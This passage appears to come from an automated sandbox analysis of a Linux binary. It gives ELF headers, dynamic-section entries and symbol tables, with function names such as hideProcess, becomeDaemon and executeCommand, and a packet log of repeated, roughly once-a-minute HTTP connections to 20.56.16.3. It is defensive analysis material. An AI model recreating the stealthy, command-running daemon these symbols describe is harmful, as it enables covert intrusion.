                            INTERP0x2000x4002000x4002000x1c0x1c3.94080x4R 0x1/lib64/ld-linux-x86-64.so.2.interp
                            LOAD0x00x4000000x4000000x17cc0x17cc4.96540x5R E0x200000.interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame
                            LOAD0x17d00x6017d00x6017d00x3100x5581.96580x6RW 0x200000.ctors .dtors .jcr .dynamic .got .got.plt .data .bss
                            DYNAMIC0x18000x6018000x6018000x1c00x1c01.51540x6RW 0x8.dynamic
                            NOTE0x21c0x40021c0x40021c0x440x443.49240x4R 0x4.note.ABI-tag .note.gnu.build-id
                            GNU_EH_FRAME0x15e00x4015e00x4015e00x5c0x5c3.57180x4R 0x4.eh_frame_hdr
                            GNU_STACK0x00x00x00x00x00.00000x6RW 0x8
                            TypeMetaValueTag
                            DT_NEEDEDsharedliblibstdc++.so.60x1
                            DT_NEEDEDsharedliblibm.so.60x1
                            DT_NEEDEDsharedliblibgcc_s.so.10x1
                            DT_NEEDEDsharedliblibc.so.60x1
                            DT_INITvalue0x400b280xc
                            DT_FINIvalue0x4013d80xd
                            DT_GNU_HASHvalue0x4002600x6ffffef5
                            DT_STRTABvalue0x4005b00x5
                            DT_SYMTABvalue0x4002980x6
                            DT_STRSZbytes5090xa
                            DT_SYMENTbytes240xb
                            DT_DEBUGvalue0x00x15
                            DT_PLTGOTvalue0x6019c80x3
                            DT_PLTRELSZbytes6720x2
                            DT_PLTRELpltrelDT_RELA0x14
                            DT_JMPRELvalue0x4008880x17
                            DT_RELAvalue0x4008400x7
                            DT_RELASZbytes720x8
                            DT_RELAENTbytes240x9
                            DT_VERNEEDvalue0x4007f00x6ffffffe
                            DT_VERNEEDNUMvalue20x6fffffff
                            DT_VERSYMvalue0x4007ae0x6ffffff0
                            DT_NULLvalue0x00x0
                            NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                            .dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                            _Jv_RegisterClasses.dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                            _ZNSolsEPFRSoS_EGLIBCXX_3.4libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            _ZNSolsEiGLIBCXX_3.4libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            _ZNSt8ios_base4InitC1EvGLIBCXX_3.4libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            _ZNSt8ios_base4InitD1EvGLIBCXX_3.4libstdc++.so.6.dynsym0x400c000FUNC<unknown>DEFAULTSHN_UNDEF
                            _ZSt4cerrGLIBCXX_3.4libstdc++.so.6.dynsym0x601ae0272OBJECT<unknown>DEFAULT25
                            _ZSt4coutGLIBCXX_3.4libstdc++.so.6.dynsym0x601c00272OBJECT<unknown>DEFAULT25
                            _ZSt4endlIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_GLIBCXX_3.4libstdc++.so.6.dynsym0x400cc00FUNC<unknown>DEFAULTSHN_UNDEF
                            _ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKcGLIBCXX_3.4libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            __cxa_atexitGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            __errno_locationGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            __gmon_start__.dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                            __gxx_personality_v0CXXABI_1.3libstdc++.so.6.dynsym0x400cd00FUNC<unknown>DEFAULTSHN_UNDEF
                            __libc_start_mainGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            chdirGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            closeGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            dup2GLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            exitGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            flockGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            forkGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            getpidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            mkdirGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            openGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            removeGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            setsidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            signalGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            sleepGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            sprintfGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            strerrorGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            strlenGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            systemGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            writeGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            .symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                            GLIBC_2.2.5libc.so.6.symtab0x4002000SECTION<unknown>DEFAULT1
                            GLIBC_2.2.5libc.so.6.symtab0x40021c0SECTION<unknown>DEFAULT2
                            GLIBCXX_3.4libstdc++.so.6.symtab0x40023c0SECTION<unknown>DEFAULT3
                            GLIBC_2.2.5libc.so.6.symtab0x4002600SECTION<unknown>DEFAULT4
                            GLIBC_2.2.5libc.so.6.symtab0x4002980SECTION<unknown>DEFAULT5
                            .symtab0x4005b00SECTION<unknown>DEFAULT6
                            .symtab0x4007ae0SECTION<unknown>DEFAULT7
                            GLIBC_2.2.5libc.so.6.symtab0x4007f00SECTION<unknown>DEFAULT8
                            GLIBCXX_3.4libstdc++.so.6.symtab0x4008400SECTION<unknown>DEFAULT9
                            GLIBC_2.2.5libc.so.6.symtab0x4008880SECTION<unknown>DEFAULT10
                            GLIBC_2.2.5libc.so.6.symtab0x400b280SECTION<unknown>DEFAULT11
                            GLIBC_2.2.5libc.so.6.symtab0x400b400SECTION<unknown>DEFAULT12
                            GLIBC_2.2.5libc.so.6.symtab0x400d100SECTION<unknown>DEFAULT13
                            GLIBCXX_3.4libstdc++.so.6.symtab0x4013d80SECTION<unknown>DEFAULT14
                            GLIBC_2.2.5libc.so.6.symtab0x4013e80SECTION<unknown>DEFAULT15
                            GLIBC_2.2.5libc.so.6.symtab0x4015e00SECTION<unknown>DEFAULT16
                            GLIBC_2.2.5libc.so.6.symtab0x4016400SECTION<unknown>DEFAULT17
                            GLIBC_2.2.5libc.so.6.symtab0x6017d00SECTION<unknown>DEFAULT18
                            GLIBC_2.2.5libc.so.6.symtab0x6017e80SECTION<unknown>DEFAULT19
                            GLIBC_2.2.5libc.so.6.symtab0x6017f80SECTION<unknown>DEFAULT20
                            GLIBC_2.2.5libc.so.6.symtab0x6018000SECTION<unknown>DEFAULT21
                            GLIBCXX_3.4libstdc++.so.6.symtab0x6019c00SECTION<unknown>DEFAULT22
                            GLIBC_2.2.5libc.so.6.symtab0x6019c80SECTION<unknown>DEFAULT23
                            GLIBC_2.2.5libc.so.6.symtab0x601ac00SECTION<unknown>DEFAULT24
                            GLIBC_2.2.5libc.so.6.symtab0x601ae00SECTION<unknown>DEFAULT25
                            GLIBC_2.2.5libc.so.6.symtab0x00SECTION<unknown>DEFAULT26
                            _DYNAMIC.symtab0x6018000OBJECT<unknown>DEFAULT21
                            _GLOBAL_OFFSET_TABLE_.symtab0x6019c80OBJECT<unknown>DEFAULT23
                            _GLOBAL__I_command.symtab0x4012e221FUNC<unknown>DEFAULT13
                            _IO_stdin_used.symtab0x4013e84OBJECT<unknown>DEFAULT15
                            _Jv_RegisterClasses.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                            _Z11hideProcessi.symtab0x400ff5252FUNC<unknown>DEFAULT13
                            _Z12becomeDaemonv.symtab0x4010f1397FUNC<unknown>DEFAULT13
                            _Z12handleSignali.symtab0x400e0e146FUNC<unknown>DEFAULT13
                            _Z14executeCommandPKc.symtab0x400df426FUNC<unknown>DEFAULT13
                            _Z21checkAndCreatePidFilei.symtab0x400ea0341FUNC<unknown>DEFAULT13
                            _Z41__static_initialization_and_destruction_0ii.symtab0x4012a264FUNC<unknown>DEFAULT13
                            _ZNSolsEPFRSoS_E@@GLIBCXX_3.4.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            _ZNSolsEi@@GLIBCXX_3.4.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            _ZNSt8ios_base4InitC1Ev@@GLIBCXX_3.4.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            _ZNSt8ios_base4InitD1Ev@@GLIBCXX_3.4.symtab0x400c000FUNC<unknown>DEFAULTSHN_UNDEF
                            _ZSt4cerr@@GLIBCXX_3.4.symtab0x601ae0272OBJECT<unknown>DEFAULT25
                            _ZSt4cout@@GLIBCXX_3.4.symtab0x601c00272OBJECT<unknown>DEFAULT25
                            _ZSt4endlIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_@@GLIBCXX_3.4.symtab0x400cc00FUNC<unknown>DEFAULTSHN_UNDEF
                            _ZStL8__ioinit.symtab0x601d201OBJECT<unknown>DEFAULT25
                            _ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc@@GLIBCXX_3.4.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            __CTOR_END__.symtab0x6017e00OBJECT<unknown>DEFAULT18
                            __CTOR_LIST__GLIBCXX_3.4libstdc++.so.6.symtab0x6017d00OBJECT<unknown>DEFAULT18
                            __DTOR_END__.symtab0x6017f00OBJECT<unknown>HIDDEN19
                            __DTOR_LIST__GLIBCXX_3.4libstdc++.so.6.symtab0x6017e80OBJECT<unknown>DEFAULT19
                            __FRAME_END__.symtab0x4017c80OBJECT<unknown>DEFAULT17
                            __JCR_END__.symtab0x6017f80OBJECT<unknown>DEFAULT20
                            __JCR_LIST__GLIBCXX_3.4libstdc++.so.6.symtab0x6017f80OBJECT<unknown>DEFAULT20
                            __bss_start.symtab0x601ae00NOTYPE<unknown>DEFAULTSHN_ABS
                            __cxa_atexit@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            __data_start.symtab0x601ac00NOTYPE<unknown>DEFAULT24
                            __do_global_ctors_aux.symtab0x4013a00FUNC<unknown>DEFAULT13
                            __do_global_dtors_auxCXXABI_1.3libstdc++.so.6.symtab0x400d600FUNC<unknown>DEFAULT13
                            __dso_handle.symtab0x4013f00OBJECT<unknown>HIDDEN15
                            __errno_location@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            __gmon_start__.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                            __gxx_personality_v0@@CXXABI_1.3.symtab0x400cd00FUNC<unknown>DEFAULTSHN_UNDEF
                            __init_array_end.symtab0x6017cc0NOTYPE<unknown>DEFAULT18
                            __init_array_start.symtab0x6017cc0NOTYPE<unknown>DEFAULT18
                            __libc_csu_fini.symtab0x4013002FUNC<unknown>DEFAULT13
                            __libc_csu_init.symtab0x401310137FUNC<unknown>DEFAULT13
                            __libc_start_main@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            _edata.symtab0x601ae00NOTYPE<unknown>DEFAULTSHN_ABS
                            _end.symtab0x601d280NOTYPE<unknown>DEFAULTSHN_ABS
                            _fini.symtab0x4013d80FUNC<unknown>DEFAULT14
                            _init.symtab0x400b280FUNC<unknown>DEFAULT11
                            _start.symtab0x400d100FUNC<unknown>DEFAULT13
                            call_gmon_startGLIBC_2.2.5libc.so.6.symtab0x400d3c0FUNC<unknown>DEFAULT13
                            chdir@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            close@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            command.symtab0x601ac88OBJECT<unknown>DEFAULT24
                            completed.6364.symtab0x601d101OBJECT<unknown>DEFAULT25
                            crtstuff.cGLIBCXX_3.4libstdc++.so.6.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            data_start.symtab0x601ac00NOTYPE<unknown>DEFAULT24
                            dtor_idx.6366.symtab0x601d188OBJECT<unknown>DEFAULT25
                            dup2@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            exit@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            flock@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            fork@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            frame_dummy.symtab0x400dd00FUNC<unknown>DEFAULT13
                            getpid@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            main.symtab0x40127e36FUNC<unknown>DEFAULT13
                            mcron.cpp.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            mkdir@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            open@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            pidFile.symtab0x601ad08OBJECT<unknown>DEFAULT24
                            remove@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            setsid@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            signal@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            sleep@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            sprintf@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            strerror@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            strlen@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            system@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            tmpDir.symtab0x601ad88OBJECT<unknown>DEFAULT24
                            write@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF

                            Download Network PCAP: filteredfull

                            • Total Packets: 134
                            • 443 (HTTPS)
                            • 80 (HTTP)
                            • 53 (DNS)
                            TimestampSource PortDest PortSource IPDest IP
                            Nov 2, 2024 10:05:52.886142969 CET5112080192.168.2.1420.56.16.3
                            Nov 2, 2024 10:05:52.890964031 CET805112020.56.16.3192.168.2.14
                            Nov 2, 2024 10:05:52.891011000 CET5112080192.168.2.1420.56.16.3
                            Nov 2, 2024 10:05:52.891045094 CET5112080192.168.2.1420.56.16.3
                            Nov 2, 2024 10:05:52.896262884 CET805112020.56.16.3192.168.2.14
                            Nov 2, 2024 10:05:54.051366091 CET805112020.56.16.3192.168.2.14
                            Nov 2, 2024 10:05:54.051759958 CET5112080192.168.2.1420.56.16.3
                            Nov 2, 2024 10:05:54.051759958 CET5112080192.168.2.1420.56.16.3
                            Nov 2, 2024 10:05:54.057332993 CET805112020.56.16.3192.168.2.14
                            Nov 2, 2024 10:05:54.057414055 CET5112080192.168.2.1420.56.16.3
                            Nov 2, 2024 10:05:54.245529890 CET5112280192.168.2.1420.56.16.3
                            Nov 2, 2024 10:05:54.250437975 CET805112220.56.16.3192.168.2.14
                            Nov 2, 2024 10:05:54.250498056 CET5112280192.168.2.1420.56.16.3
                            Nov 2, 2024 10:05:54.251400948 CET5112280192.168.2.1420.56.16.3
                            Nov 2, 2024 10:05:54.256285906 CET805112220.56.16.3192.168.2.14
                            Nov 2, 2024 10:05:55.403881073 CET805112220.56.16.3192.168.2.14
                            Nov 2, 2024 10:05:55.403985977 CET5112280192.168.2.1420.56.16.3
                            Nov 2, 2024 10:05:55.406519890 CET5112280192.168.2.1420.56.16.3
                            Nov 2, 2024 10:05:55.411850929 CET805112220.56.16.3192.168.2.14
                            Nov 2, 2024 10:05:55.411899090 CET5112280192.168.2.1420.56.16.3
                            Nov 2, 2024 10:06:03.831352949 CET46540443192.168.2.14185.125.190.26
                            Nov 2, 2024 10:06:35.062417030 CET46540443192.168.2.14185.125.190.26
                            Nov 2, 2024 10:06:52.883415937 CET5112480192.168.2.1420.56.16.3
                            Nov 2, 2024 10:06:52.888183117 CET805112420.56.16.3192.168.2.14
                            Nov 2, 2024 10:06:52.888237000 CET5112480192.168.2.1420.56.16.3
                            Nov 2, 2024 10:06:52.888264894 CET5112480192.168.2.1420.56.16.3
                            Nov 2, 2024 10:06:52.893033981 CET805112420.56.16.3192.168.2.14
                            Nov 2, 2024 10:06:54.060653925 CET805112420.56.16.3192.168.2.14
                            Nov 2, 2024 10:06:54.060900927 CET5112480192.168.2.1420.56.16.3
                            Nov 2, 2024 10:06:54.060900927 CET5112480192.168.2.1420.56.16.3
                            Nov 2, 2024 10:06:54.075061083 CET805112420.56.16.3192.168.2.14
                            Nov 2, 2024 10:06:54.075104952 CET5112480192.168.2.1420.56.16.3
                            Nov 2, 2024 10:06:54.259572029 CET5112680192.168.2.1420.56.16.3
                            Nov 2, 2024 10:06:54.269324064 CET805112620.56.16.3192.168.2.14
                            Nov 2, 2024 10:06:54.269404888 CET5112680192.168.2.1420.56.16.3
                            Nov 2, 2024 10:06:54.270478010 CET5112680192.168.2.1420.56.16.3
                            Nov 2, 2024 10:06:54.276525021 CET805112620.56.16.3192.168.2.14
                            Nov 2, 2024 10:06:55.460819006 CET805112620.56.16.3192.168.2.14
                            Nov 2, 2024 10:06:55.461235046 CET5112680192.168.2.1420.56.16.3
                            Nov 2, 2024 10:06:55.464040995 CET5112680192.168.2.1420.56.16.3
                            Nov 2, 2024 10:06:55.469810963 CET805112620.56.16.3192.168.2.14
                            Nov 2, 2024 10:06:55.469897985 CET5112680192.168.2.1420.56.16.3
                            Nov 2, 2024 10:07:52.890105009 CET5112880192.168.2.1420.56.16.3
                            Nov 2, 2024 10:07:52.894884109 CET805112820.56.16.3192.168.2.14
                            Nov 2, 2024 10:07:52.894974947 CET5112880192.168.2.1420.56.16.3
                            Nov 2, 2024 10:07:52.894989014 CET5112880192.168.2.1420.56.16.3
                            Nov 2, 2024 10:07:52.899801016 CET805112820.56.16.3192.168.2.14
                            Nov 2, 2024 10:07:54.372159004 CET805112820.56.16.3192.168.2.14
                            Nov 2, 2024 10:07:54.372252941 CET805112820.56.16.3192.168.2.14
                            Nov 2, 2024 10:07:54.372539043 CET5112880192.168.2.1420.56.16.3
                            Nov 2, 2024 10:07:54.372539043 CET5112880192.168.2.1420.56.16.3
                            Nov 2, 2024 10:07:54.372539043 CET5112880192.168.2.1420.56.16.3
                            Nov 2, 2024 10:07:54.377680063 CET805112820.56.16.3192.168.2.14
                            Nov 2, 2024 10:07:54.377751112 CET5112880192.168.2.1420.56.16.3
                            Nov 2, 2024 10:07:54.518026114 CET5113080192.168.2.1420.56.16.3
                            Nov 2, 2024 10:07:54.522871971 CET805113020.56.16.3192.168.2.14
                            Nov 2, 2024 10:07:54.522936106 CET5113080192.168.2.1420.56.16.3
                            Nov 2, 2024 10:07:54.523950100 CET5113080192.168.2.1420.56.16.3
                            Nov 2, 2024 10:07:54.528660059 CET805113020.56.16.3192.168.2.14
                            Nov 2, 2024 10:07:55.969543934 CET805113020.56.16.3192.168.2.14
                            Nov 2, 2024 10:07:55.969659090 CET5113080192.168.2.1420.56.16.3
                            Nov 2, 2024 10:07:55.970973015 CET805113020.56.16.3192.168.2.14
                            Nov 2, 2024 10:07:55.971014977 CET5113080192.168.2.1420.56.16.3
                            Nov 2, 2024 10:07:55.972014904 CET5113080192.168.2.1420.56.16.3
                            Nov 2, 2024 10:07:55.986816883 CET805113020.56.16.3192.168.2.14
                            Nov 2, 2024 10:07:55.986880064 CET5113080192.168.2.1420.56.16.3
                            Nov 2, 2024 10:08:52.922485113 CET5113280192.168.2.1420.56.16.3
                            Nov 2, 2024 10:08:52.927438974 CET805113220.56.16.3192.168.2.14
                            Nov 2, 2024 10:08:52.927486897 CET5113280192.168.2.1420.56.16.3
                            Nov 2, 2024 10:08:52.927510977 CET5113280192.168.2.1420.56.16.3
                            Nov 2, 2024 10:08:52.932298899 CET805113220.56.16.3192.168.2.14
                            Nov 2, 2024 10:08:54.102874041 CET805113220.56.16.3192.168.2.14
                            Nov 2, 2024 10:08:54.102988958 CET5113280192.168.2.1420.56.16.3
                            Nov 2, 2024 10:08:54.103044987 CET5113280192.168.2.1420.56.16.3
                            Nov 2, 2024 10:08:54.108438969 CET805113220.56.16.3192.168.2.14
                            Nov 2, 2024 10:08:54.108495951 CET5113280192.168.2.1420.56.16.3
                            Nov 2, 2024 10:08:54.233429909 CET5113480192.168.2.1420.56.16.3
                            Nov 2, 2024 10:08:54.238214016 CET805113420.56.16.3192.168.2.14
                            Nov 2, 2024 10:08:54.238262892 CET5113480192.168.2.1420.56.16.3
                            Nov 2, 2024 10:08:54.239042044 CET5113480192.168.2.1420.56.16.3
                            Nov 2, 2024 10:08:54.243869066 CET805113420.56.16.3192.168.2.14
                            Nov 2, 2024 10:08:55.400192976 CET805113420.56.16.3192.168.2.14
                            Nov 2, 2024 10:08:55.400326014 CET5113480192.168.2.1420.56.16.3
                            Nov 2, 2024 10:08:55.402287006 CET5113480192.168.2.1420.56.16.3
                            Nov 2, 2024 10:08:55.407402992 CET805113420.56.16.3192.168.2.14
                            Nov 2, 2024 10:08:55.407453060 CET5113480192.168.2.1420.56.16.3
                            Nov 2, 2024 10:09:52.939338923 CET5113680192.168.2.1420.56.16.3
                            Nov 2, 2024 10:09:52.944335938 CET805113620.56.16.3192.168.2.14
                            Nov 2, 2024 10:09:52.944410086 CET5113680192.168.2.1420.56.16.3
                            Nov 2, 2024 10:09:52.974863052 CET5113680192.168.2.1420.56.16.3
                            Nov 2, 2024 10:09:52.979711056 CET805113620.56.16.3192.168.2.14
                            Nov 2, 2024 10:09:54.112191916 CET805113620.56.16.3192.168.2.14
                            Nov 2, 2024 10:09:54.112427950 CET5113680192.168.2.1420.56.16.3
                            Nov 2, 2024 10:09:54.112565041 CET5113680192.168.2.1420.56.16.3
                            Nov 2, 2024 10:09:54.117666006 CET805113620.56.16.3192.168.2.14
                            Nov 2, 2024 10:09:54.117708921 CET5113680192.168.2.1420.56.16.3
                            Nov 2, 2024 10:09:54.283935070 CET5113880192.168.2.1420.56.16.3
                            Nov 2, 2024 10:09:54.288791895 CET805113820.56.16.3192.168.2.14
                            Nov 2, 2024 10:09:54.288862944 CET5113880192.168.2.1420.56.16.3
                            Nov 2, 2024 10:09:54.289859056 CET5113880192.168.2.1420.56.16.3
                            Nov 2, 2024 10:09:54.294728994 CET805113820.56.16.3192.168.2.14
                            Nov 2, 2024 10:09:55.462785959 CET805113820.56.16.3192.168.2.14
                            Nov 2, 2024 10:09:55.463103056 CET5113880192.168.2.1420.56.16.3
                            Nov 2, 2024 10:09:55.465615034 CET5113880192.168.2.1420.56.16.3
                            Nov 2, 2024 10:09:55.471178055 CET805113820.56.16.3192.168.2.14
                            Nov 2, 2024 10:09:55.471256018 CET5113880192.168.2.1420.56.16.3
                            Nov 2, 2024 10:10:53.034138918 CET5114080192.168.2.1420.56.16.3
                            Nov 2, 2024 10:10:53.038942099 CET805114020.56.16.3192.168.2.14
                            Nov 2, 2024 10:10:53.039000034 CET5114080192.168.2.1420.56.16.3
                            Nov 2, 2024 10:10:53.039072990 CET5114080192.168.2.1420.56.16.3
                            Nov 2, 2024 10:10:53.043832064 CET805114020.56.16.3192.168.2.14
                            Nov 2, 2024 10:10:54.200016975 CET805114020.56.16.3192.168.2.14
                            Nov 2, 2024 10:10:54.200181961 CET5114080192.168.2.1420.56.16.3
                            Nov 2, 2024 10:10:54.200223923 CET5114080192.168.2.1420.56.16.3
                            Nov 2, 2024 10:10:54.205948114 CET805114020.56.16.3192.168.2.14
                            Nov 2, 2024 10:10:54.205988884 CET5114080192.168.2.1420.56.16.3
                            Nov 2, 2024 10:10:54.342519045 CET5114280192.168.2.1420.56.16.3
                            Nov 2, 2024 10:10:54.347381115 CET805114220.56.16.3192.168.2.14
                            Nov 2, 2024 10:10:54.347434998 CET5114280192.168.2.1420.56.16.3
                            Nov 2, 2024 10:10:54.348264933 CET5114280192.168.2.1420.56.16.3
                            Nov 2, 2024 10:10:54.353228092 CET805114220.56.16.3192.168.2.14
                            Nov 2, 2024 10:10:55.524571896 CET805114220.56.16.3192.168.2.14
                            Nov 2, 2024 10:10:55.524704933 CET5114280192.168.2.1420.56.16.3
                            Nov 2, 2024 10:10:55.527183056 CET5114280192.168.2.1420.56.16.3
                            Nov 2, 2024 10:10:55.532454967 CET805114220.56.16.3192.168.2.14
                            Nov 2, 2024 10:10:55.532501936 CET5114280192.168.2.1420.56.16.3
                            Nov 2, 2024 10:11:53.049505949 CET5114480192.168.2.1420.56.16.3
                            Nov 2, 2024 10:11:53.054409027 CET805114420.56.16.3192.168.2.14
                            Nov 2, 2024 10:11:53.054471016 CET5114480192.168.2.1420.56.16.3
                            Nov 2, 2024 10:11:53.054505110 CET5114480192.168.2.1420.56.16.3
                            Nov 2, 2024 10:11:53.059259892 CET805114420.56.16.3192.168.2.14
                            Nov 2, 2024 10:11:54.212130070 CET805114420.56.16.3192.168.2.14
                            Nov 2, 2024 10:11:54.212241888 CET5114480192.168.2.1420.56.16.3
                            Nov 2, 2024 10:11:54.212291956 CET5114480192.168.2.1420.56.16.3
                            Nov 2, 2024 10:11:54.217694044 CET805114420.56.16.3192.168.2.14
                            Nov 2, 2024 10:11:54.217744112 CET5114480192.168.2.1420.56.16.3
                            Nov 2, 2024 10:11:54.367703915 CET5114680192.168.2.1420.56.16.3
                            Nov 2, 2024 10:11:54.372505903 CET805114620.56.16.3192.168.2.14
                            Nov 2, 2024 10:11:54.372555017 CET5114680192.168.2.1420.56.16.3
                            Nov 2, 2024 10:11:54.373389959 CET5114680192.168.2.1420.56.16.3
                            Nov 2, 2024 10:11:54.378176928 CET805114620.56.16.3192.168.2.14
                            Nov 2, 2024 10:11:55.517473936 CET805114620.56.16.3192.168.2.14
                            Nov 2, 2024 10:11:55.517652988 CET5114680192.168.2.1420.56.16.3
                            Nov 2, 2024 10:11:55.519875050 CET5114680192.168.2.1420.56.16.3
                            Nov 2, 2024 10:11:55.525110960 CET805114620.56.16.3192.168.2.14
                            Nov 2, 2024 10:11:55.525160074 CET5114680192.168.2.1420.56.16.3
                            Nov 2, 2024 10:12:53.078541994 CET5114880192.168.2.1420.56.16.3
                            Nov 2, 2024 10:12:53.083380938 CET805114820.56.16.3192.168.2.14
                            Nov 2, 2024 10:12:53.083439112 CET5114880192.168.2.1420.56.16.3
                            Nov 2, 2024 10:12:53.083514929 CET5114880192.168.2.1420.56.16.3
                            Nov 2, 2024 10:12:53.088290930 CET805114820.56.16.3192.168.2.14
                            Nov 2, 2024 10:12:54.241400957 CET805114820.56.16.3192.168.2.14
                            Nov 2, 2024 10:12:54.241596937 CET5114880192.168.2.1420.56.16.3
                            Nov 2, 2024 10:12:54.241700888 CET5114880192.168.2.1420.56.16.3
                            Nov 2, 2024 10:12:54.247132063 CET805114820.56.16.3192.168.2.14
                            Nov 2, 2024 10:12:54.247179031 CET5114880192.168.2.1420.56.16.3
                            Nov 2, 2024 10:12:54.386250973 CET5115080192.168.2.1420.56.16.3
                            Nov 2, 2024 10:12:54.391129017 CET805115020.56.16.3192.168.2.14
                            Nov 2, 2024 10:12:54.391185045 CET5115080192.168.2.1420.56.16.3
                            Nov 2, 2024 10:12:54.392009974 CET5115080192.168.2.1420.56.16.3
                            Nov 2, 2024 10:12:54.396817923 CET805115020.56.16.3192.168.2.14
                            Nov 2, 2024 10:12:55.572721958 CET805115020.56.16.3192.168.2.14
                            Nov 2, 2024 10:12:55.573064089 CET5115080192.168.2.1420.56.16.3
                            Nov 2, 2024 10:12:55.575366974 CET5115080192.168.2.1420.56.16.3
                            Nov 2, 2024 10:12:55.580806017 CET805115020.56.16.3192.168.2.14
                            Nov 2, 2024 10:12:55.580862999 CET5115080192.168.2.1420.56.16.3
                            Nov 2, 2024 10:13:53.053536892 CET5115280192.168.2.1420.56.16.3
                            Nov 2, 2024 10:13:53.058473110 CET805115220.56.16.3192.168.2.14
                            Nov 2, 2024 10:13:53.058588028 CET5115280192.168.2.1420.56.16.3
                            Nov 2, 2024 10:13:53.058599949 CET5115280192.168.2.1420.56.16.3
                            Nov 2, 2024 10:13:53.063426018 CET805115220.56.16.3192.168.2.14
                            Nov 2, 2024 10:13:54.233221054 CET805115220.56.16.3192.168.2.14
                            Nov 2, 2024 10:13:54.233323097 CET5115280192.168.2.1420.56.16.3
